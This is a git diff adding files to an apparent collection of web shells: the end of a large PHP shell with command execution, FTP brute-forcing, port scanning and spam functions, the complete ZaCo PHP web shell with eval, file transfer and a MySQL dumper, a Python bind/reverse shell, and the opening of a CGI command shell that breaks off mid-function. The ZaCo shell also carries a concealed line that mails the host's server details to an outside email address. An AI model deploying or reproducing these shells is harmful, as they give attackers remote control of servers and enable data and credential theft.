+    </tr>
+
+    <tr>
+
+     <td class=texte>Login:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbuser' SIZE='30' VALUE='root' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Password</td>
+
+     <td><INPUT TYPE='Password' NAME='dbpass' SIZE='30' VALUE='' class=form></td>
+
+    </tr>
+
+   </table>
+
+   <br> <center> <br><br>
+
+   <input type='submit' value=' Connect ' class=form></center> </form> <br><br>
+
+  </td>
+
+  <td></td>
+
+ </tr>
+
+ <tr>
+
+  <td height=1 colspan=3></td>
+
+ </tr>
+
+</table>
+
+</center>";
+
+
+
+}
+
+// SQL END
+
+
+
+/* main() */
+
+set_time_limit(0);
+
+
+
+if ( $action !="download") print("$HTML");
+
+
+
+if (!isset($cm)) {
+
+ if (!isset($action)) {
+
+  if (!isset($tm)) { $tm = getcwd(); }
+
+  $curdir = getcwd();
+
+  if (!@chdir($tm)) exit("<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert>Access to directory is denied, see CHMOD.</td></tr></table>");
+
+  getdir();
+
+  chdir($curdir);
+
+  $supsub = $gdir[$j-1];
+
+  if (!isset($tm) ) { $tm=getcwd();}
+
+  readdirdata($tm);
+
+ } else {
+
+  switch ($action) {
+
+   case "view":
+
+    viewfile($tm,$fi);
+
+    break;
+
+   case "delete":
+
+    echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>$fi</b> was deleted successfully.</font></center></td></tr></table>";
+
+    deletef($tm);
+
+    break;
+
+   case "download":
+
+   if (isset($fatt) && strlen($fatt)>0) {
+
+    $attach=$fatt;
+
+    header("Content-type: text/plain");
+
+   }
+
+   else {
+
+    $attach=$fi;
+
+    header("Content-type: hackru");
+
+   }
+
+   header("Content-disposition: attachment; filename=\"$attach\";");
+
+   readfile($tm."/".$fi);
+
+   break;
+
+   case "download_mail":
+
+   download_mail($tm,$fi);
+
+   break;
+
+   case "edit":
+
+   editfile($tm,$fi);
+
+   break;
+
+  case "save":
+
+   savefile($tm,$fi);
+
+   break;
+
+  case "uploadd":
+
+   uploadtem();
+
+   break;
+
+  case "up":
+
+   up($tm);
+
+   break;
+
+  case "newdir":
+
+   newdir($tm);
+
+   break;
+
+  case "createdir":
+
+   cdir($tm);
+
+   break;
+
+  case "deldir":
+
+   deldir();
+
+   break;
+
+  case "feedback":
+
+   mailsystem();
+
+   break;
+
+  case "upload":
+
+   upload();
+
+   break;
+
+  case "help":
+
+   help();
+
+   break;
+
+  case "ftp":
+
+   ftp();
+
+   break;
+
+  case "portscan":
+
+   portscan();
+
+   break;
+
+  case "sql":
+
+   sql();
+
+   break;
+
+  case "tar":
+
+   tar();
+
+   break;
+
+  case "bash":
+
+   bash();
+
+   break;
+
+  case "passwd":
+
+   passwd();
+
+   break;
+
+  case "exploits":
+
+   exploits($dir);
+
+   break;
+
+  case "upload_exploits":
+
+   upload_exploits($dir);
+
+   break;
+
+  case "upload_exploitsp":
+
+   upload_exploitsp($dir);
+
+   break;
+
+  case "arhiv":
+
+   arhiv($tm,$pass);
+
+   break;
+
+  case "crypte":
+
+   crypte();
+
+   break;
+
+  case "decrypte":
+
+   decrypte();
+
+   break;
+
+  case "brut_ftp":
+
+   brut_ftp();
+
+   break;
+
+  case "copyfile":
+
+   copyfile($tm,$fi);
+
+   break;
+
+  case "down":
+
+   down($dir);
+
+   break;
+
+  case "downfiles":
+
+   downfiles($dir);
+
+   break;
+
+  case "spam":
+
+   spam();
+
+   break;
+
+  }
+
+ }
+
+} else {
+
+ echo "<br><table CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFFF BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center>Done: $cm</center><pre>";
+
+ echo system($cm);
+
+ echo "</pre></td></tr></table>";
+
+}
+
+
+
+if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd"  && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "ftp" && $action != "portscan" && $action != "sql" && $action != "tar"  && $action != "bash" && $action != "anonimmail") {
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Command prompy (like bash):</b></td></tr><tr><td valign=top><input type=text name=cm size=90 class='inputbox'></td><td valign=top><input type=submit value='GO' class=button1 $style_button></td></tr></form></table>";
+
+ $perdir = @permissions(fileperms($tm));
+
+ if ($perdir && $perdir[7] == "w" && isset($tm)) uploadtem();
+
+ else echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Unable to upload files to current directory</b></font></td></tr></table>";
+
+ if ($perdir[7] == "w" && isset($tm)) {
+
+  echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'POST' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Create directory:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='GO' class=button1 $style_button></td></tr></form></table>";
+
+ } else {
+
+  echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Unable to create directory here</b></td></tr></table>";
+
+ }
+
+}
+
+
+
+if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd"  && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "aliases" && $action != "portscan" && $action != "ftp" && $action != "sql" && $action != "tar" && $action != "bash" && $action != "anonimmail") {
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Ready usefull requests to unix server:</b></td></tr><tr><td valign=top width=95%><select name=cm class='inputbox'>";
+
+ foreach ($aliases as $alias_name=>$alias_cmd) echo "<option size=80 class='inputbox'>$alias_name</option>";
+
+ echo "</select></td><td valign=top align=right width=5%><input type=submit value='GO' class=button1 $style_button></td></tr></table></form>";
+
+}
+
+
+
+if ( $action !="download") echo nfm_copyright();
+
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/zacosmall.php.txt b/xakep-shells/PHP/zacosmall.php.txt
new file mode 100644
index 0000000..26075b4
--- /dev/null
+++ b/xakep-shells/PHP/zacosmall.php.txt
@@ -0,0 +1,501 @@
+<?
+  ##########################################################
+ # Small PHP Web Shell by ZaCo (c) 2004-2006                #
+ #  +POST method                                            #
+ #  +MySQL Client+Dumper for DB  and tables                 #
+ #  +PHP eval in text format and html for phpinfo() example #
+ # PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther      #
+ # For antichat.ru and cup.su friends usage                 #
+ # All bugs -> mailo:zaco@yandex.ru                         #
+ # Just for fun :)                                          #
+  ##########################################################
+error_reporting(E_ALL);
+@set_time_limit(0);
+function magic_q($s)
+{
+if(get_magic_quotes_gpc())
+{
+$s=str_replace('\\\'','\'',$s);
+$s=str_replace('\\\\','\\',$s);
+$s=str_replace('\\"','"',$s);
+$s=str_replace('\\\0','\0',$s);
+}
+return $s;
+}$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+function get_perms($fn)
+{
+$mode=fileperms($fn);
+$perms='';
+$perms .= ($mode & 00400) ? 'r' : '-';
+$perms .= ($mode & 00200) ? 'w' : '-';
+$perms .= ($mode & 00100) ? 'x' : '-';
+$perms .= ($mode & 00040) ? 'r' : '-';
+$perms .= ($mode & 00020) ? 'w' : '-';
+$perms .= ($mode & 00010) ? 'x' : '-';
+$perms .= ($mode & 00004) ? 'r' : '-';
+$perms .= ($mode & 00002) ? 'w' : '-';
+$perms .= ($mode & 00001) ? 'x' : '-';
+return $perms;
+}
+$head=<<<headka
+<html>
+<head>
+<title>Small Web Shell by ZaCo</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+</head>
+<body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34>
+<style>
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+</style>
+headka;
+$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
+$page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
+$winda=strpos(strtolower(php_uname()),'wind');
+define('format',50);
+$pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:'');
+switch($page)
+{
+case 'eval':
+{
+$eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
+$eval_value=magic_q($eval_value);
+$action=isset($_POST['action'])?$_POST['action']:'eval';
+if($action=='eval_in_html') @eval($eval_value);
+else
+{
+echo($head.$pages);
+?>
+<hr>
+<form method=post>
+<textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea>
+<input name='action' value='eval' type='submit'>
+<input name='action' value='eval_in_html' type='submit'>
+<input name='page' value='eval' type=hidden>
+</form>
+<hr>
+<?
+}
+break;
+}
+case 'cmd':
+{
+$cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):'';
+$work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd();
+$action=isset($_POST['action'])?$_POST['action']:'cmd';
+if(@is_dir($work_dir))
+{
+@chdir($work_dir);
+$work_dir=getcwd();
+if($work_dir=='')$work_dir='/';
+else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
+}
+else if(file_exists($work_dir))$work_dir=realpath($work_dir);
+$work_dir=str_replace('\\','/',$work_dir);
+$e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES);
+switch($action)
+{
+case 'cmd' :
+{
+echo($head.$pages);
+?>
+<form method='post' name='main_form'>
+<input name='work_dir' value='<?=$e_work_dir?>' type=text size=120>
+<input name='page' value='cmd' type=hidden>
+<input type=submit value='go'>
+</form>
+<form method=post>
+<input name='cmd' type=text size=120 value='<?=str_replace('\'','&#039;',$cmd)?>'>
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<form method=post enctype="multipart/form-data">
+<input type="file" name="filename">
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<form method=post>
+<input name='fname' type=text size=120><br>
+<input name='archive' type=radio value='none'>without arch
+<input name='archive' type=radio value='gzip' checked=true>gzip archive
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<pre>
+<?
+if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");}
+else
+{
+$f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
+if(@is_dir($work_dir))
+{
+echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
+$handle=@opendir($work_dir);
+if($handle)
+{
+while(false!==($fn=readdir($handle))){$files[]=$fn;};
+@closedir($handle);
+sort($files);
+$not_dirs=array();
+for($i=0;$i<sizeof($files);$i++)
+{
+$fn=$files[$i];
+if(is_dir($fn))
+{
+echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn)));
+if($winda===false)
+{
+$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
+$group=@posix_getgrgid(@filegroup($work_dir.$fn));
+printf("% 20s|% -20s",$owner['name'],$group['name']);
+}
+echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
+printf("% 20s ",@filesize($work_dir.$fn).'B');
+printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
+}
+else {$not_dirs[]=$fn;}
+}
+for($i=0;$i<sizeof($not_dirs);$i++)
+{
+$fn=$not_dirs[$i];
+echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn)));
+if($winda===false)
+{
+$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
+$group=@posix_getgrgid(@filegroup($work_dir.$fn));
+printf("% 20s|% -20s",$owner['name'],$group['name']);
+}
+echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
+printf("% 20s ",@filesize($work_dir.$fn).'B');
+printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
+}
+echo('</pre><hr>');
+?>
+<form name='list' method=post>
+<input name='work_dir' type=hidden size=120><br>
+<input name='page' value='cmd' type=hidden>
+<input name='f_action' value='view' type=hidden>
+</form>
+<?
+} else echo('Error Listing '.$e_work_dir);
+}
+else
+switch($f_action)
+{
+case 'view':
+{
+echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n");
+$f=@fopen($work_dir,'r');
+?>
+<form method=post>
+<textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea>
+<input name='page' value='cmd' type=hidden>
+<input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120>
+<input name='f_action' value='save' type=submit>
+</form>
+<?
+break;
+}
+case 'save' :
+{
+$file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):'';
+$f=@fopen($work_dir,'w');
+if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n");
+else
+{
+fwrite($f,$file_text);
+fclose($f);
+echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
+}
+break;
+}
+}
+break;
+}
+break;
+}
+case 'upload' :
+{
+if($work_dir=='')$work_dir='/';
+else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
+$f=$_FILES["filename"]["name"];
+if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
+else
+{
+echo('file is uploaded in '.$e_work_dir);
+}
+break;
+}
+case 'download' :
+{
+$fname=isset($_POST['fname'])?$_POST['fname']:'';
+$temp_file=isset($_POST['temp_file'])?'on':'nn';
+$f=@fopen($fname,'r');
+if(!($f)) echo('file is not exists');
+else
+{
+$archive=isset($_POST['archive'])?$_POST['archive']:'';
+if($archive=='gzip')
+{
+Header("Content-Type:application/x-gzip\n");
+$s=gzencode(fread($f,filesize($fname)));
+Header('Content-Length: '.strlen($s)."\n");
+Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n");
+echo($s);
+}
+else
+{
+Header("Content-Type:application/octet-stream\n");
+Header('Content-Length: '.filesize($fname)."\n");
+Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n");
+ob_start();
+while(feof($f)===false)
+{
+echo(fread($f,10000));
+ob_flush();
+}
+}
+}
+}
+}
+break;
+}
+case 'mysql' :
+{
+$action=isset($_POST['action'])?$_POST['action']:'query';
+$user=isset($_POST['user'])?$_POST['user']:'';
+$passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
+$db=isset($_POST['db'])?$_POST['db']:'';
+$host=isset($_POST['host'])?$_POST['host']:'localhost';
+$query=isset($_POST['query'])?magic_q($_POST['query']):'';
+switch($action)
+{
+case 'dump' :
+{
+$mysql_link=@mysql_connect($host,$user,$passwd);
+if(!($mysql_link)) echo('Connect error');
+else
+{
+//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
+$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
+$archive=isset($_POST['archive'])?$_POST['archive']:'none';
+if($archive!=='none')$to_file=false;
+$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
+$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
+if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
+else
+{
+$dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n";
+ob_start();
+if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false;
+if($table_dump=='')
+{
+if(!$to_file)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+$result=mysql_query('show tables',$mysql_link);
+for($i=0;$i<mysql_num_rows($result);$i++)
+{
+$rows=mysql_fetch_array($result);
+$result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link);
+if(!$result2)$dump_file.='#error table '.$rows[0];
+else
+{
+$dump_file.='create table `'.$rows[0]."`(\n";
+for($j=0;$j<mysql_num_rows($result2)-1;$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
+}
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
+$type[$j]=$rows2[1];
+$dump_file.=");\n";
+mysql_free_result($result2);
+$result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link);
+$columns=$j-1;
+for($j=0;$j<mysql_num_rows($result2);$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='insert into `'.$rows[0].'` values (';
+for($k=0;$k<$columns;$k++)
+{
+$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
+}
+$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
+if($archive=='none')
+{
+if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
+else
+{
+echo($dump_file);
+ob_flush();
+}
+$dump_file='';
+}
+}
+mysql_free_result($result2);
+}
+}
+mysql_free_result($result);
+if($archive!='none')
+{
+$dump_file=gzencode($dump_file);
+header('Content-Length: '.strlen($dump_file)."\n");
+echo($dump_file);
+}
+else if($t_f)
+{
+fclose($t_f);
+echo('Dump for '.$db_dump.' now in '.$to_file);
+}
+}
+else
+{
+$result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link);
+if(!$result2)echo('error table '.$table_dump);
+else
+{
+if(!$to_file)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+if($to_file===false)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+$dump_file.="create table `{$table_dump}`(\n";
+for($j=0;$j<mysql_num_rows($result2)-1;$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
+}
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
+$type[$j]=$rows2[1];
+$dump_file.=");\n";
+mysql_free_result($result2);
+$result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link);
+$columns=$j-1;
+for($j=0;$j<mysql_num_rows($result2);$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='insert into `'.$table_dump.'` values (';
+for($k=0;$k<$columns;$k++)
+{
+$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
+}
+$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
+if($archive=='none')
+{
+if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
+else
+{
+echo($dump_file);
+ob_flush();
+}
+$dump_file='';
+}
+}
+mysql_free_result($result2);
+if($archive!='none')
+{
+$dump_file=gzencode($dump_file);
+header('Content-Length: '.strlen($dump_file)."\n");
+echo $dump_file;
+}else if($t_f)
+{
+fclose($t_f);
+echo('Dump for '.$db_dump.' now in '.$to_file);
+}
+}
+}
+}
+}
+break;
+}
+case 'query' :
+{
+echo($head.$pages);
+?>
+<hr>
+<form method=post>
+<table>
+<td>
+<table align=left>
+<tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host' type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr>
+<tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr>
+</table>
+</td>
+<td>
+<table>
+<tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr>
+<tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
+<input name='archive' type=radio value='none'>without arch
+<input name='archive' type=radio value='gzip' checked=true>gzip archive
+<tr><td><input type=submit name='action' value='dump'></td></tr>
+<tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
+</table>
+</td>
+</table>
+<input name='page' value='mysql' type=hidden>
+<input name='action' value='query' type=submit>
+</form>
+<hr>
+<?
+$mysql_link=@mysql_connect($host,$user,$passwd);
+if(!($mysql_link)) echo('Connect error');
+else
+{
+if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;}
+//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
+$result=@mysql_query($query,$mysql_link);
+if(!($result))echo(mysql_error());
+else
+{
+echo("<table valign=top align=left>\n<tr>");
+for($i=0;$i<mysql_num_fields($result);$i++)
+echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b>  </td>');
+echo("\n</tr>\n");
+for($i=0;$i<mysql_num_rows($result);$i++)
+{
+$rows=mysql_fetch_array($result);
+echo('<tr valign=top align=left>');
+for($j=0;$j<mysql_num_fields($result);$j++)
+{
+echo('<td>'.(htmlspecialchars($rows[$j])).'</td>');
+}
+echo("</tr>\n");
+}
+echo("</table>\n");
+}
+mysql_close($mysql_link);
+}
+break;
+}
+}
+break;
+}
+}
+?>
\ No newline at end of file
diff --git a/xakep-shells/PY/Phyton Shell.py.txt b/xakep-shells/PY/Phyton Shell.py.txt
new file mode 100644
index 0000000..10b6029
--- /dev/null
+++ b/xakep-shells/PY/Phyton Shell.py.txt	
@@ -0,0 +1,121 @@
+#!/usr/bin/env python
+
+# # # # # # # # # # # # # # # # # # # # # # # # # # # # #
+#   d00r.py 0.3a (reverse|bind)-shell in python by fQ	#
+#							#
+#	alpha						#
+#							#
+#							#
+# usage: 						#
+# 	% ./d00r -b password port			#
+#	% ./d00r -r password port host			#
+#	% nc host port					#
+#	% nc -l -p port (please use netcat)		#
+# # # # # # # # # # # # # # # # # # # # # # # # # # # #	#
+
+
+import os, sys, socket, time
+
+
+# =================== var =======
+MAX_LEN=1024
+SHELL="/bin/zsh -c"
+TIME_OUT=300 #s
+PW=""
+PORT=""
+HOST=""
+
+
+# =================== funct =====
+# shell - exec command, return stdout, stderr; improvable
+def shell(cmd):
+	sh_out=os.popen(SHELL+" "+cmd).readlines()
+	nsh_out=""
+	for i in range(len(sh_out)):	
+		nsh_out+=sh_out[i]
+	return nsh_out	
+
+# action?
+def action(conn):
+	conn.send("\nPass?\n")
+	try: pw_in=conn.recv(len(PW))
+	except: print "timeout"
+	else:	
+		if pw_in == PW:	
+			conn.send("j00 are on air!\n")						
+			while True:               		
+				conn.send(">>> ")
+				try:
+					pcmd=conn.recv(MAX_LEN)
+				except:
+					print "timeout"
+					return True					
+				else:
+					#print "pcmd:",pcmd
+					cmd=""#pcmd
+					for i in range(len(pcmd)-1):
+						cmd+=pcmd[i]
+			                if cmd==":dc":
+						return True
+					elif cmd==":sd":
+						return False
+					else:
+						if len(cmd)>0:
+							out=shell(cmd)
+							conn.send(out)
+
+
+# =================== main ======
+argv=sys.argv
+
+if len(argv)<4: 
+	print "error; help: head -n 16 d00r.py"
+	sys.exit(1)
+elif argv[1]=="-b": 
+	PW=argv[2]
+	PORT=argv[3]
+elif argv[1]=="-r" and len(argv)>4:
+	PW=argv[2]
+	PORT=argv[3]
+	HOST=argv[4]
+else: exit(1)
+
+PORT=int(PORT)
+print "PW:",PW,"PORT:",PORT,"HOST:",HOST
+	
+#sys.argv[0]="d00r"
+
+# exit father proc
+if os.fork()!=0: 
+	sys.exit(0)
+
+# associate the socket
+sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.settimeout(TIME_OUT)
+
+if argv[1]=="-b":
+	sock.bind(('localhost', PORT))
+	sock.listen(0)
+
+run=True
+while run:
+
+	if argv[1]=="-r":
+		try: sock.connect( (HOST, PORT) )
+		except: 
+			print "host unreachable"
+			time.sleep(5)
+		else: run=action(sock)
+	else:		
+		try:	(conn,addr)=sock.accept()
+		except: 
+			print "timeout"
+			time.sleep(1)
+		else: run=action(conn)			
+	
+	# shutdown the sokcet
+	if argv[1]=="-b": conn.shutdown(2)
+	else:
+		try: sock.send("")
+		except: time.sleep(1)
+		else: sock.shutdown(2)
\ No newline at end of file
diff --git a/xakep-shells/PY/cgi-python.py.txt b/xakep-shells/PY/cgi-python.py.txt
new file mode 100644
index 0000000..0002497
--- /dev/null
+++ b/xakep-shells/PY/cgi-python.py.txt
@@ -0,0 +1,124 @@
+#!/usr/bin/python
+# 07-07-04
+# v1.0.0
+
+# cgi-shell.py
+# A simple CGI that executes arbitrary shell commands.
+
+
+# Copyright Michael Foord
+# You are free to modify, use and relicense this code.
+
+# No warranty express or implied for the accuracy, fitness to purpose or otherwise for this code....
+# Use at your own risk !!!
+
+# E-mail michael AT foord DOT me DOT uk
+# Maintained at www.voidspace.org.uk/atlantibots/pythonutils.html
+
+"""
+A simple CGI script to execute shell commands via CGI.
+"""
+################################################################
+# Imports
+try:
+    import cgitb; cgitb.enable()
+except:
+    pass
+import sys, cgi, os
+sys.stderr = sys.stdout
+from time import strftime
+import traceback
+from StringIO import StringIO
+from traceback import print_exc
+
+################################################################
+# constants
+
+fontline = '<FONT COLOR=#424242 style="font-family:times;font-size:12pt;">'
+versionstring = 'Version 1.0.0 7th July 2004'
+
+if os.environ.has_key("SCRIPT_NAME"):
+    scriptname = os.environ["SCRIPT_NAME"]
+else:
+    scriptname = ""
+
+METHOD = '"POST"'
+
+################################################################
+# Private functions and variables
+
+def getform(valuelist, theform, notpresent=''):
+    """This function, given a CGI form, extracts the data from it, based on
+    valuelist passed in. Any non-present values are set to '' - although this can be changed.
+    (e.g. to return None so you can test for missing keywords - where '' is a valid answer but to have the field missing isn't.)"""
+    data = {}
+    for field in valuelist:
+        if not theform.has_key(field):
+            data[field] = notpresent
+        else:
